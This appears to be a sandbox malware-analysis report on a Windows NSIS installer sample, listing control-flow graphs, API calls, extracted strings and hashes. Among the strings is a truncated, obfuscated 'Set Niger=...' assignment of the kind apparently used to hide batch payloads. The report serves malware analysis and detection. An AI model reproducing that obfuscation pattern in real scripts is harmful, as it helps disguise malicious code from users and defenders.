                                        • API ID: FilePathWindow$AttributesDirectoryErrorLastNameShow$CreateCurrentForegroundFullMessageMovePostQuitSearchShortSleep
                                        • String ID: Aborting: "%s"$BringToFront$Call: %d$CreateDirectory: "%s" (%d)$CreateDirectory: "%s" created$CreateDirectory: can't create "%s" (err=%d)$CreateDirectory: can't create "%s" - a file already exists$IfFileExists: file "%s" does not exist, jumping %d$IfFileExists: file "%s" exists, jumping %d$Jump: %d$Rename failed: %s$Rename on reboot: %s$Rename: %s$SetFileAttributes failed.$SetFileAttributes: "%s":%08X$Sleep(%d)$detailprint: %s
                                        • API String ID: 2872004960-3619442763
                                        • Opcode ID: e7226c198396c3fe3a7f3bea8c4d52a2e846d2bb9e79691e18455936b93e1c7d
                                        • Instruction ID: b6b48939bc8a7188504c618ab7841b31fdd5898bf24c808f75461ec369738802
                                        • Opcode Fuzzy Hash: e7226c198396c3fe3a7f3bea8c4d52a2e846d2bb9e79691e18455936b93e1c7d
                                        • Instruction Fuzzy Hash: 0AB1F471A00204ABDB10BF61DD46DAE3B69EF44314B21817FF946B21E1DA7D4E40CAAE

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 426 40592c-405944 call 4062fc 429 405946-405956 call 405f51 426->429 430 405958-405990 call 405ed3 426->430 438 4059b3-4059dc call 403e95 call 40677e 429->438 435 405992-4059a3 call 405ed3 430->435 436 4059a8-4059ae lstrcatW 430->436 435->436 436->438 444 405a70-405a78 call 40677e 438->444 445 4059e2-4059e7 438->445 451 405a86-405a8d 444->451 452 405a7a-405a81 call 406805 444->452 445->444 446 4059ed-405a15 call 405ed3 445->446 446->444 453 405a17-405a1b 446->453 455 405aa6-405acb LoadImageW 451->455 456 405a8f-405a95 451->456 452->451 460 405a1d-405a2c call 405d06 453->460 461 405a2f-405a3b lstrlenW 453->461 458 405ad1-405b13 RegisterClassW 455->458 459 405b66-405b6e call 40141d 455->459 456->455 457 405a97-405a9c call 403e74 456->457 457->455 465 405c35 458->465 466 405b19-405b61 SystemParametersInfoW CreateWindowExW 458->466 478 405b70-405b73 459->478 479 405b78-405b83 call 403e95 459->479 460->461 462 405a63-405a6b call 406722 call 406009 461->462 463 405a3d-405a4b lstrcmpiW 461->463 462->444 463->462 470 405a4d-405a57 GetFileAttributesW 463->470 469 405c37-405c3e 465->469 466->459 475 405a59-405a5b 470->475 476 405a5d-405a5e call 406751 470->476 475->462 475->476 476->462 478->469 484 405b89-405ba6 ShowWindow LoadLibraryW 479->484 485 405c0c-405c0d call 405047 479->485 487 405ba8-405bad LoadLibraryW 484->487 488 405baf-405bc1 GetClassInfoW 484->488 491 405c12-405c14 485->491 487->488 489 405bc3-405bd3 GetClassInfoW RegisterClassW 488->489 490 405bd9-405bfc DialogBoxParamW call 40141d 488->490 489->490 495 405c01-405c0a call 403c68 490->495 493 405c16-405c1c 491->493 494 405c2e-405c30 call 40141d 491->494 493->478 496 405c22-405c29 call 40141d 493->496 494->465 495->469 496->478
                                        APIs
                                          • Part of subcall function 004062FC: GetModuleHandleA.KERNEL32(?,?,00000020,004038C6,00000008), ref: 0040630A
                                          • Part of subcall function 004062FC: LoadLibraryA.KERNELBASE(?,?,?,00000020,004038C6,00000008), ref: 00406315
                                          • Part of subcall function 004062FC: GetProcAddress.KERNEL32(00000000), ref: 00406327
                                        • lstrcatW.KERNEL32(004D30C0,00447240,80000001,Control Panel\Desktop\ResourceLocale,00000000,00447240,00000000,00000006,004C30A0,-00000002,00000000,004D70C8,00403AC1,?), ref: 004059AE
                                        • lstrlenW.KERNEL32(00462540,?,?,?,00462540,00000000,004C70A8,004D30C0,00447240,80000001,Control Panel\Desktop\ResourceLocale,00000000,00447240,00000000,00000006,004C30A0), ref: 00405A30
                                        • lstrcmpiW.KERNEL32(00462538,.exe,00462540,?,?,?,00462540,00000000,004C70A8,004D30C0,00447240,80000001,Control Panel\Desktop\ResourceLocale,00000000,00447240,00000000), ref: 00405A43
                                        • GetFileAttributesW.KERNEL32(00462540), ref: 00405A4E
                                          • Part of subcall function 00405F51: wsprintfW.USER32 ref: 00405F5E
                                        • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,004C70A8), ref: 00405AB7
                                        • RegisterClassW.USER32(0046AD60), ref: 00405B0A
                                        • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00405B22
                                        • CreateWindowExW.USER32(00000080,?,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00405B5B
                                          • Part of subcall function 00403E95: SetWindowTextW.USER32(00000000,0046ADC0), ref: 00403F30
                                        • ShowWindow.USER32(00000005,00000000), ref: 00405B91
                                        • LoadLibraryW.KERNELBASE(RichEd20), ref: 00405BA2
                                        • LoadLibraryW.KERNEL32(RichEd32), ref: 00405BAD
                                        • GetClassInfoW.USER32(00000000,RichEdit20A,0046AD60), ref: 00405BBD
                                        • GetClassInfoW.USER32(00000000,RichEdit,0046AD60), ref: 00405BCA
                                        • RegisterClassW.USER32(0046AD60), ref: 00405BD3
                                        • DialogBoxParamW.USER32(?,00000000,00405479,00000000), ref: 00405BF2
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000058.00000002.3140116988.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000058.00000002.3140089029.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                        • Associated: 00000058.00000002.3140154893.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                        • Associated: 00000058.00000002.3140189526.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                        • Associated: 00000058.00000002.3140189526.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                        • Associated: 00000058.00000002.3140189526.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                        • Associated: 00000058.00000002.3140316265.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_88_2_400000_RevenueDevices.jbxd
                                        Similarity
                                        • API ID: ClassLoad$InfoLibraryWindow$Register$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemTextlstrcatlstrcmpilstrlenwsprintf
                                        • String ID: .DEFAULT\Control Panel\International$.exe$@%F$@rD$B%F$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
                                        • API String ID: 608394941-1650083594
                                        • Opcode ID: 18be7924d3bcca259bbbf180237d25193f30e5c9112311b2c349bb590eb249de
                                        • Instruction ID: 271ce27004ef92612bfc9362a6cc74883a37054a4c8cca7c49d128c059fded9a
                                        • Opcode Fuzzy Hash: 18be7924d3bcca259bbbf180237d25193f30e5c9112311b2c349bb590eb249de
                                        • Instruction Fuzzy Hash: 5E71A370604B04AED721AB65EE85F2736ACEB44749F00053FF945B22E2D7B89D418F6E

                                        Control-flow Graph

                                        APIs
                                          • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                          • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                        • lstrcatW.KERNEL32(00000000,00000000,%NodeTransexual%,004CB0B0,00000000,00000000), ref: 00401A76
                                        • CompareFileTime.KERNEL32(-00000014,?,%NodeTransexual%,%NodeTransexual%,00000000,00000000,%NodeTransexual%,004CB0B0,00000000,00000000), ref: 00401AA0
                                          • Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016
                                          • Part of subcall function 00404F72: lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
                                          • Part of subcall function 00404F72: lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
                                          • Part of subcall function 00404F72: lstrcatW.KERNEL32(0043B228,004034BB,004034BB,0043B228,?,00000000,00000000), ref: 00404FCD
                                          • Part of subcall function 00404F72: SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
                                          • Part of subcall function 00404F72: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
                                          • Part of subcall function 00404F72: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
                                          • Part of subcall function 00404F72: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000058.00000002.3140116988.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000058.00000002.3140089029.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                        • Associated: 00000058.00000002.3140154893.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                        • Associated: 00000058.00000002.3140189526.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                        • Associated: 00000058.00000002.3140189526.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                        • Associated: 00000058.00000002.3140189526.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                        • Associated: 00000058.00000002.3140316265.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_88_2_400000_RevenueDevices.jbxd
                                        Similarity
                                        • API ID: MessageSendlstrlen$lstrcat$CompareFileTextTimeWindowlstrcpynwvsprintf
                                        • String ID: %NodeTransexual%$File: error creating "%s"$File: error, user abort$File: error, user cancel$File: error, user retry$File: overwriteflag=%d, allowskipfilesflag=%d, name="%s"$File: skipped: "%s" (overwriteflag=%d)$File: wrote %d to "%s"
                                        • API String ID: 4286501637-2490022183
                                        • Opcode ID: b6a2df31382c61c88927ef82d5f6ae0aba2303a4f2552ab8741c3bf9876e390d
                                        • Instruction ID: fe683e2e252f9e2189d7cf48164ff2fe6631720e8c40e43e96375682ff159270
                                        • Opcode Fuzzy Hash: b6a2df31382c61c88927ef82d5f6ae0aba2303a4f2552ab8741c3bf9876e390d
                                        • Instruction Fuzzy Hash: 9D510871901114BADF10BBB1CD46EAE3A68DF05369F21413FF416B10D2EB7C5A518AAE

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 587 403587-4035d5 GetTickCount GetModuleFileNameW call 405e50 590 4035e1-40360f call 406009 call 406751 call 406009 GetFileSize 587->590 591 4035d7-4035dc 587->591 599 403615 590->599 600 4036fc-40370a call 4032d2 590->600 592 4037b6-4037ba 591->592 602 40361a-403631 599->602 606 403710-403713 600->606 607 4037c5-4037ca 600->607 604 403633 602->604 605 403635-403637 call 403336 602->605 604->605 611 40363c-40363e 605->611 609 403715-40372d call 403368 call 403336 606->609 610 40373f-403769 GlobalAlloc call 403368 call 40337f 606->610 607->592 609->607 637 403733-403739 609->637 610->607 635 40376b-40377c 610->635 613 403644-40364b 611->613 614 4037bd-4037c4 call 4032d2 611->614 619 4036c7-4036cb 613->619 620 40364d-403661 call 405e0c 613->620 614->607 623 4036d5-4036db 619->623 624 4036cd-4036d4 call 4032d2 619->624 620->623 634 403663-40366a 620->634 631 4036ea-4036f4 623->631 632 4036dd-4036e7 call 407281 623->632 624->623 631->602 636 4036fa 631->636 632->631 634->623 640 40366c-403673 634->640 641 403784-403787 635->641 642 40377e 635->642 636->600 637->607 637->610 640->623 643 403675-40367c 640->643 644 40378a-403792 641->644 642->641 643->623 645 40367e-403685 643->645 644->644 646 403794-4037af SetFilePointer call 405e0c 644->646 645->623 647 403687-4036a7 645->647 650 4037b4 646->650 647->607 649 4036ad-4036b1 647->649 651 4036b3-4036b7 649->651 652 4036b9-4036c1 649->652 650->592 651->636 651->652 652->623 653 4036c3-4036c5 652->653 653->623
                                        APIs
                                        • GetTickCount.KERNEL32 ref: 00403598
                                        • GetModuleFileNameW.KERNEL32(00000000,004DF0D8,00002004,?,?,?,00000000,00403A47,?), ref: 004035B4
                                          • Part of subcall function 00405E50: GetFileAttributesW.KERNELBASE(00000003,004035C7,004DF0D8,80000000,00000003,?,?,?,00000000,00403A47,?), ref: 00405E54
                                          • Part of subcall function 00405E50: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A47,?), ref: 00405E76
                                        • GetFileSize.KERNEL32(00000000,00000000,004E30E0,00000000,004CF0B8,004CF0B8,004DF0D8,004DF0D8,80000000,00000003,?,?,?,00000000,00403A47,?), ref: 00403600
                                        Strings
                                        • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 004037C5
                                        • soft, xrefs: 00403675
                                        • Inst, xrefs: 0040366C
                                        • Error launching installer, xrefs: 004035D7
                                        • Null, xrefs: 0040367E
                                        Memory Dump Source
                                        • Source File: 00000058.00000002.3140116988.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000058.00000002.3140089029.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                        • Associated: 00000058.00000002.3140154893.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                        • Associated: 00000058.00000002.3140189526.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                        • Associated: 00000058.00000002.3140189526.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                        • Associated: 00000058.00000002.3140189526.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                        • Associated: 00000058.00000002.3140316265.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_88_2_400000_RevenueDevices.jbxd
                                        Similarity
                                        • API ID: File$AttributesCountCreateModuleNameSizeTick
                                        • String ID: Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                        • API String ID: 4283519449-527102705
                                        • Opcode ID: 120a85709c4a4315a44e2654504c88cd7b3d990096a9d7006e83d60a3a2719f2
                                        • Instruction ID: 97831ba7e8e922ff386f77eab0e0d18630bd2de4bbb47cca7d976ce2c46b30f6
                                        • Opcode Fuzzy Hash: 120a85709c4a4315a44e2654504c88cd7b3d990096a9d7006e83d60a3a2719f2
                                        • Instruction Fuzzy Hash: 3151D5B1900204AFDB219F65CD85B9E7EB8AB14756F10803FE605B72D1D77D9E808B9C

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 654 40337f-403396 655 403398 654->655 656 40339f-4033a7 654->656 655->656 657 4033a9 656->657 658 4033ae-4033b3 656->658 657->658 659 4033c3-4033d0 call 403336 658->659 660 4033b5-4033be call 403368 658->660 664 4033d2 659->664 665 4033da-4033e1 659->665 660->659 666 4033d4-4033d5 664->666 667 4033e7-403407 GetTickCount call 4072f2 665->667 668 403518-40351a 665->668 669 403539-40353d 666->669 680 403536 667->680 682 40340d-403415 667->682 670 40351c-40351f 668->670 671 40357f-403583 668->671 673 403521 670->673 674 403524-40352d call 403336 670->674 675 403540-403546 671->675 676 403585 671->676 673->674 674->664 689 403533 674->689 678 403548 675->678 679 40354b-403559 call 403336 675->679 676->680 678->679 679->664 691 40355f-403572 WriteFile 679->691 680->669 685 403417 682->685 686 40341a-403428 call 403336 682->686 685->686 686->664 692 40342a-403433 686->692 689->680 693 403511-403513 691->693 694 403574-403577 691->694 695 403439-403456 call 407312 692->695 693->666 694->693 696 403579-40357c 694->696 699 40350a-40350c 695->699 700 40345c-403473 GetTickCount 695->700 696->671 699->666 701 403475-40347d 700->701 702 4034be-4034c2 700->702 703 403485-4034b6 MulDiv wsprintfW call 404f72 701->703 704 40347f-403483 701->704 705 4034c4-4034c7 702->705 706 4034ff-403502 702->706 712 4034bb 703->712 704->702 704->703 709 4034e7-4034ed 705->709 710 4034c9-4034db WriteFile 705->710 706->682 707 403508 706->707 707->680 711 4034f3-4034f7 709->711 710->693 713 4034dd-4034e0 710->713 711->695 715 4034fd 711->715 712->702 713->693 714 4034e2-4034e5 713->714 714->711 715->680
                                        APIs
                                        • GetTickCount.KERNEL32 ref: 004033E7
                                        • GetTickCount.KERNEL32 ref: 00403464
                                        • MulDiv.KERNEL32(7FFFFFFF,00000064,?), ref: 00403491
                                        • wsprintfW.USER32 ref: 004034A4
                                        • WriteFile.KERNELBASE(00000000,00000000,?,7FFFFFFF,00000000), ref: 004034D3
                                        • WriteFile.KERNEL32(00000000,0041F150,?,00000000,00000000,0041F150,?,000000FF,00000004,00000000,00000000,00000000), ref: 0040356A
                                        Strings
                                        • Set Niger=gMoAEngineer-Hdtv-Register-Usda-Supported-Mount-Soma-Annotation-Guard-lMAAlien-UKWPostposted-Kuwait-Al-Jennifer-Specialists-Expressions-bdPassive-Advertisers-Further-Unsubscribe-Drivers-Disco-lNCompleted-KRuxInjection-Med-HeTft-Crazy-Sh, xrefs: 004033A9
                                        • ... %d%%, xrefs: 0040349E
                                        • X1C, xrefs: 0040343C
                                        • X1C, xrefs: 004033ED
                                        Memory Dump Source
                                        • Source File: 00000058.00000002.3140116988.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000058.00000002.3140089029.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                        • Associated: 00000058.00000002.3140154893.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                        • Associated: 00000058.00000002.3140189526.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                        • Associated: 00000058.00000002.3140189526.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                        • Associated: 00000058.00000002.3140189526.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                        • Associated: 00000058.00000002.3140316265.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_88_2_400000_RevenueDevices.jbxd
                                        Similarity
                                        • API ID: CountFileTickWrite$wsprintf
                                        • String ID: ... %d%%$Set Niger=gMoAEngineer-Hdtv-Register-Usda-Supported-Mount-Soma-Annotation-Guard-lMAAlien-UKWPostposted-Kuwait-Al-Jennifer-Specialists-Expressions-bdPassive-Advertisers-Further-Unsubscribe-Drivers-Disco-lNCompleted-KRuxInjection-Med-HeTft-Crazy-Sh$X1C$X1C
                                        • API String ID: 651206458-337224829
                                        • Opcode ID: 44661cc85d05d2ece2df72a1dadfaff530150b4f00ec14a98415859341c8c9fb
                                        • Instruction ID: 0313947f0097750978ec936bbe46de4fad37e772bc1cb17ec77dd8e30cfa9ece
                                        • Opcode Fuzzy Hash: 44661cc85d05d2ece2df72a1dadfaff530150b4f00ec14a98415859341c8c9fb
                                        • Instruction Fuzzy Hash: 88518D71900219ABDF10DF65AE44AAF7BACAB00316F14417BF900B7290DB78DF40CBA9

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 716 404f72-404f85 717 405042-405044 716->717 718 404f8b-404f9e 716->718 719 404fa0-404fa4 call 406805 718->719 720 404fa9-404fb5 lstrlenW 718->720 719->720 722 404fd2-404fd6 720->722 723 404fb7-404fc7 lstrlenW 720->723 726 404fe5-404fe9 722->726 727 404fd8-404fdf SetWindowTextW 722->727 724 405040-405041 723->724 725 404fc9-404fcd lstrcatW 723->725 724->717 725->722 728 404feb-40502d SendMessageW * 3 726->728 729 40502f-405031 726->729 727->726 728->729 729->724 730 405033-405038 729->730 730->724
                                        APIs
                                        • lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
                                        • lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
                                        • lstrcatW.KERNEL32(0043B228,004034BB,004034BB,0043B228,?,00000000,00000000), ref: 00404FCD
                                        • SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
                                        • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
                                        • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
                                        • SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D
                                          • Part of subcall function 00406805: GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6
                                        Memory Dump Source
                                        • Source File: 00000058.00000002.3140116988.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000058.00000002.3140089029.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                        • Associated: 00000058.00000002.3140154893.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                        • Associated: 00000058.00000002.3140189526.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                        • Associated: 00000058.00000002.3140189526.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                        • Associated: 00000058.00000002.3140189526.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                        • Associated: 00000058.00000002.3140316265.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_88_2_400000_RevenueDevices.jbxd
                                        Similarity
                                        • API ID: MessageSend$lstrlen$TextVersionWindowlstrcat
                                        • String ID:
                                        • API String ID: 2740478559-0
                                        • Opcode ID: 7bcaf298b14bfcb271399e4538be81cf37b8538d1c197863d88476df1de4366a
                                        • Instruction ID: 1d640e6b4f0869ec625b39ce8112f9bd6789598538fb42bade37fe3884716a8e
                                        • Opcode Fuzzy Hash: 7bcaf298b14bfcb271399e4538be81cf37b8538d1c197863d88476df1de4366a
                                        • Instruction Fuzzy Hash: 3C21B0B1900518BACF119FA5DD84E9EBFB5EF84310F10813AFA04BA291D7798E509F98

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 731 401eb9-401ec4 732 401f24-401f26 731->732 733 401ec6-401ec9 731->733 734 401f53-401f7b GlobalAlloc call 406805 732->734 735 401f28-401f2a 732->735 736 401ed5-401ee3 call 4062a3 733->736 737 401ecb-401ecf 733->737 750 4030e3-4030f2 734->750 751 402387-40238d GlobalFree 734->751 739 401f3c-401f4e call 406009 735->739 740 401f2c-401f36 call 4062a3 735->740 748 401ee4-402702 call 406805 736->748 737->733 741 401ed1-401ed3 737->741 739->751 740->739 741->736 747 401ef7-402e50 call 406009 * 3 741->747 747->750 763 402708-40270e 748->763 751->750 763->750
                                        APIs
                                          • Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016
                                        • GlobalFree.KERNELBASE(007EEE60), ref: 00402387
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000058.00000002.3140116988.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000058.00000002.3140089029.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                        • Associated: 00000058.00000002.3140154893.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                        • Associated: 00000058.00000002.3140189526.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                        • Associated: 00000058.00000002.3140189526.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                        • Associated: 00000058.00000002.3140189526.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                        • Associated: 00000058.00000002.3140316265.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_88_2_400000_RevenueDevices.jbxd
                                        Similarity
                                        • API ID: FreeGloballstrcpyn
                                        • String ID: %NodeTransexual%$Exch: stack < %d elements$Pop: stack empty$`~
                                        • API String ID: 1459762280-2278293435
                                        • Opcode ID: 1ca185eeaafbead47595a1cc0f367f8cfd746e673960b0814e4cdcb04772ee17
                                        • Instruction ID: ae7cb1f2c63b60d7baa415153617f8c61fd22799b34192a347ea6a0a5f6d971a
                                        • Opcode Fuzzy Hash: 1ca185eeaafbead47595a1cc0f367f8cfd746e673960b0814e4cdcb04772ee17
                                        • Instruction Fuzzy Hash: 4721D172601105EBE710EB95DD81A6F77A8EF44318B21003FF542F32D1EB7998118AAD

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 766 4022fd-402325 call 40145c GetFileVersionInfoSizeW 769 4030e3-4030f2 766->769 770 40232b-402339 GlobalAlloc 766->770 770->769 771 40233f-40234e GetFileVersionInfoW 770->771 773 402350-402367 VerQueryValueW 771->773 774 402384-40238d GlobalFree 771->774 773->774 777 402369-402381 call 405f51 * 2 773->777 774->769 777->774
                                        APIs
                                        • GetFileVersionInfoSizeW.VERSION(00000000,?,000000EE), ref: 0040230C
                                        • GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 0040232E
                                        • GetFileVersionInfoW.VERSION(?,?,?,00000000), ref: 00402347
                                        • VerQueryValueW.VERSION(?,00408838,?,?,?,?,?,00000000), ref: 00402360
                                          • Part of subcall function 00405F51: wsprintfW.USER32 ref: 00405F5E
                                        • GlobalFree.KERNELBASE(007EEE60), ref: 00402387
                                        Memory Dump Source
                                        • Source File: 00000058.00000002.3140116988.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000058.00000002.3140089029.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                        • Associated: 00000058.00000002.3140154893.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                        • Associated: 00000058.00000002.3140189526.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                        • Associated: 00000058.00000002.3140189526.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                        • Associated: 00000058.00000002.3140189526.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                        • Associated: 00000058.00000002.3140316265.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_88_2_400000_RevenueDevices.jbxd
                                        Similarity
                                        • API ID: FileGlobalInfoVersion$AllocFreeQuerySizeValuewsprintf
                                        • String ID:
                                        • API String ID: 3376005127-0
                                        • Opcode ID: 6f3e0dbebcfa7f75c0754c170d72e8097fcb7c93b116c2da6e8eed637ff4f305
                                        • Instruction ID: 606d2f288e59f9406d2e88b5b0598c54d729d8d595f649ff0f3e4a994beab86c
                                        • Opcode Fuzzy Hash: 6f3e0dbebcfa7f75c0754c170d72e8097fcb7c93b116c2da6e8eed637ff4f305
                                        • Instruction Fuzzy Hash: 82115E72900109AFCF00EFA1DD45DAE7BB8EF04344F10403AFA09F61A1D7799A40DB19

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 782 402b23-402b37 GlobalAlloc 783 402b39-402b49 call 401446 782->783 784 402b4b-402b6a call 40145c WideCharToMultiByte lstrlenA 782->784 789 402b70-402b73 783->789 784->789 790 402b93 789->790 791 402b75-402b8d call 405f6a WriteFile 789->791 792 4030e3-4030f2 790->792 791->790 796 402384-40238d GlobalFree 791->796 796->792
                                        APIs
                                        • GlobalAlloc.KERNEL32(00000040,00002004), ref: 00402B2B
                                        • WideCharToMultiByte.KERNEL32(?,?,0040F0D0,000000FF,?,00002004,?,?,00000011), ref: 00402B61
                                        • lstrlenA.KERNEL32(?,?,?,0040F0D0,000000FF,?,00002004,?,?,00000011), ref: 00402B6A
                                        • WriteFile.KERNEL32(00000000,?,?,00000000,?,?,?,?,0040F0D0,000000FF,?,00002004,?,?,00000011), ref: 00402B85
                                        Memory Dump Source
                                        • Source File: 00000058.00000002.3140116988.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000058.00000002.3140089029.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                        • Associated: 00000058.00000002.3140154893.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                        • Associated: 00000058.00000002.3140189526.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                        • Associated: 00000058.00000002.3140189526.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                        • Associated: 00000058.00000002.3140189526.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                        • Associated: 00000058.00000002.3140316265.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_88_2_400000_RevenueDevices.jbxd
                                        Similarity
                                        • API ID: AllocByteCharFileGlobalMultiWideWritelstrlen
                                        • String ID:
                                        • API String ID: 2568930968-0
                                        • Opcode ID: 02f149ecbdf3f63b5c58a8b7f5a2f789e982e3470d3956ff315881f03770554e
                                        • Instruction ID: 5d007b3c2ae3d1ce6b2586a1921c4ad46276280cee2e515d5d1d957ff8a092fa
                                        • Opcode Fuzzy Hash: 02f149ecbdf3f63b5c58a8b7f5a2f789e982e3470d3956ff315881f03770554e
                                        • Instruction Fuzzy Hash: 76016171500205FBDB14AF70DE48D9E3B78EF05359F10443AF646B91E1D6798982DB68

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 799 402713-40273b call 406009 * 2 804 402746-402749 799->804 805 40273d-402743 call 40145c 799->805 807 402755-402758 804->807 808 40274b-402752 call 40145c 804->808 805->804 809 402764-40278c call 40145c call 4062a3 WritePrivateProfileStringW 807->809 810 40275a-402761 call 40145c 807->810 808->807 810->809
                                        APIs
                                          • Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016
                                        • WritePrivateProfileStringW.KERNEL32(?,?,?,00000000), ref: 0040278C
                                        Strings
